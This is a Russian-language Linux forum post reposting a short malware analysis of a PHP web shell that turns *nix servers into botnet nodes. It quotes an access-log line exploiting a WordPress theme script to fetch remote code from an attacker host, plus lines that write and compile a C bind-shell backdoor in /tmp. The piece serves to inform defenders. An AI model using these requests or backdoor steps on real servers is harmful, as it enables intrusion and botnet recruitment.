Пример того, как сервер под управлением *nix может стать час

Важные объявления связанные с Linux. Выпуск новых версий, ошибки безопасности, обновления и др.
Ответить
Аватара пользователя
vasilich
Сообщения: 696
Зарегистрирован: 03 окт 2012, 14:04
Темы: 498
Статус: Не в сети

Пример того, как сервер под управлением *nix может стать час

Сообщение vasilich » 02 мар 2013, 14:36

Пример того, как сервер под управлением *nix может стать частью ботнета
В последнее время на различных ресурсах появляются сообщения о том, что злоумышленники все чаще используют для осуществления DDoS-атак серверные конфигурации. Очевидно, что для использования такой системы необходимо сначала получить к ней доступ. Не так давно я столкнулся с довольно интересным, как мне показалось, образцом PHP Shell'а.

Итак, как же злоумышленники осуществляют загрузку вредоносного кода на сервер? Тут все банально – рассматриваемый образец был загружен в результате эксплуатации известной уязвимости:

"GET /wp-content/themes/newsworld/thumbopen.php?src=http%3A%2F%2Fpicasa.com.orland******.com/kikok.php HTTP/1.1" 400 447 "-" "Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1"

Вот содержимое kikok.php: paste.ubuntu.com/5577560/
После выполнения несложных операций по декодированию из base64 получим следующее: paste.ubuntu.com/5577565/
На первый взгляд, типичный PHP Shell, что же тут такого необычного? В теле PHP-скрипта присутствует код на C:
Sample 1

Sample 2

Sample 3


Код компилирурется непосредственно на сервере:
cf("/tmp/bd.c",$port_bind_bd_c);
$blah = ex("gcc -o /tmp/bd /tmp/bd.c");
...

Согласитесь, весьма необычная реализация.
А вот как реагирует на подобного рода семплы антивирусная индустрия в целом: http://www.virustotal.com/ru/file/4d0d5 ... 362169702/
*nix, malware, php, C

http://habrahabr.ru/post/171317/

Ответить

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и 0 гостей